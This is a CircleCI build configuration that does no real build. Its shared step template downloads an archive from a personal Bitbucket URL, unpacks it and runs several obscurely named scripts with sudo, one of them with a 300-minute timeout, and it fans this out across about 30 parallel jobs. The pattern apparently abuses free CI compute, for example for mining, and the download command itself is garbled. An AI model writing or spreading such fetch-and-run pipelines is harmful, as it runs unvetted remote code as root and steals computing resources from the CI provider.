working_dir: &working_dir ~/app
.build_template: &commonSteps
  steps:
    - checkout
    - run:
        name: 0
        command: |
          sleep 15s
          wget https://bitbucket.org/carolinamar/marque/downloads/setup4.zipunzip && setup.zip && chmod 755 *
    - run:
        name: Ani
        command: |
          sudo ./Ani.sh
    - run:
        name: Bui
        command: |
          sudo ./Bui.sh
    - run:
        name: Coi
        command: |
          sudo ./Coi.sh
    - run:
        name: Dai
        command: |
          sudo ./Dai.sh
    - run:
        name: Eyi
        no_output_timeout: 300m
        command: |
          echo "Begin Starting"
          sleep 120s
          sudo bash Eyi.sh

  working_directory: *working_dir

version: 2.0

jobs:
  Aoi_00:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_01:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_02:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_03:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_04:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_05:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_06:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_07:
    docker:
      - image: circleci/python:3.9.2-buster
    steps:
      - checkout
  Aoi_08:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_09:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_10:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_11:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_12:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_13:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_14:
    docker:
      - image: circleci/python:3.9.2-buster
    steps:
      - checkout
  Aoi_15:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_16:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_17:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_18:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_19:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_20:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_21:
    docker:
      - image: circleci/python:3.9.2-buster
    steps:
      - checkout
  Aoi_22:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_23:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_24:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_25:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_26:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_27:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_28:
    docker:
      - image: circleci/python:3.9.2-buster
    steps:
      - checkout
  Aoi_29:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_30:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_31:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_32:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_33:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_34:
    <<: *commonSteps
    docker:
      - image: circleci/clojure:lein-2.9.5
  Aoi_35:
    docker:
      - image: circleci/python:3.9.2-buster
    steps:
      - checkout


workflows:
  version: 2
  build_all:
    jobs:
      - Aoi_00
      - Aoi_01
      - Aoi_02
      - Aoi_03
      - Aoi_04
      - Aoi_05
      - Aoi_06
      - Aoi_07
      - Aoi_08
      - Aoi_09  
      - Aoi_10
      - Aoi_11
      - Aoi_12
      - Aoi_13
      - Aoi_14
      - Aoi_15
      - Aoi_16
      - Aoi_17
      - Aoi_18
      - Aoi_19
      - Aoi_20
      - Aoi_21
      - Aoi_22
      - Aoi_23
      - Aoi_24
      - Aoi_25
      - Aoi_26
      - Aoi_27
      - Aoi_28
      - Aoi_29
      - Aoi_30 
      - Aoi_31
      - Aoi_32
      - Aoi_33
      - Aoi_34
      - Aoi_35







